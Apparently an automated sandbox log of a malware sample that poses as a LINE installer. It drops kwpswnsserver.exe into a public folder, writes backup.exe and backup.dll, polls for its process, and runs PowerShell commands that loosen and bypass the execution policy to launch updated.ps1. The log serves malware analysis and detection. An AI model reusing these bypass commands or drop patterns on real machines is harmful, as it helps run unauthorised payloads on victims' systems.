Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "kwpswnsserver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: microsoft.windowsappruntime.bootstrap.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: dinput8.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: devenum.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq kwpswnsserver.exe"
Source: linit-v4.1.6.exe.lnk.3.drLNK file: ..\..\Public\Bilite\linit-v4.1.6.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: OdiHmn3pRK.exeStatic file information: File size 36618436 > 1048576
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdby source: powershell.exe, 00000012.00000002.2580579399.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\jenkins_agent\workspace\windows_desktop_new_installer_build\line-updater\LineInstaller\bin\LineInstaller.pdb source: OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2580579399.0000000002D51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\workspace\gitlab\wns\kwpswnsserver\bin\release\kwpswnsserver.pdb2 source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000000.1759768891.00000000004D1000.00000002.00000001.01000000.00000005.sdmp, kwpswnsserver.exe, 00000003.00000002.3558976514.00000000004D1000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: \YSS\Release\Microsoft.WindowsAppRuntime.Bootstrap.pdb source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2584651859.000000000738E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\workspace\gitlab\wns\kwpswnsserver\bin\release\kwpswnsserver.pdb source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000000.1759768891.00000000004D1000.00000002.00000001.01000000.00000005.sdmp, kwpswnsserver.exe, 00000003.00000002.3558976514.00000000004D1000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2589252311.00000000084EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000012.00000002.2589479854.000000000850F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\jenkins_agent\workspace\windows_desktop_new_installer_build\line-updater\LineInstaller\bin\LineInstaller.pdbI source: OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Unpacked PE file: 3.2.kwpswnsserver.exe.4270000.6.unpack
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow, 0_2_00406D5D
Source: Microsoft.WindowsAppRuntime.Bootstrap.dll.0.dr | Static PE information: section name: .00cfg
Source: linit-v4.1.6.exe.0.dr | Static PE information: section name: .fptable
Source: backup.dll.3.dr | Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | Code function: 0_2_00411C20 push eax; ret 0_2_00411C4E
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_004B1D95 push ecx; ret 3_2_004B1DA8
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_04292470 push ebp; retf 3_2_04292474
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_04292450 push ebp; retf 3_2_04292474
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_0429A0B8 push eax; ret 3_2_0429A119
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_0429A168 push eax; ret 3_2_0429A119
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_04284345 push ecx; ret 3_2_04284358
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C87F610 push eax; mov dword ptr [esp], 8007000Eh 3_2_6C87F614
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C88FC63 push esi; ret 3_2_6C88FC65
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | Code function: 3_2_6C89F5ED push ecx; ret 3_2_6C89F600
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File created: C:\Users\user\AppData\Local\Temp\backup.exe
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | File created: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe | File created: C:\Users\user\AppData\Local\Temp\backup.dll
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | File created: C:\Users\Public\Bilite\linit-v4.1.6.exe
Source: C:\Users\user\Desktop\OdiHmn3pRK.exe | File created: C:\Users\Public\Bilite\Axialis\Microsoft.WindowsAppRuntime.Bootstrap.dll

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
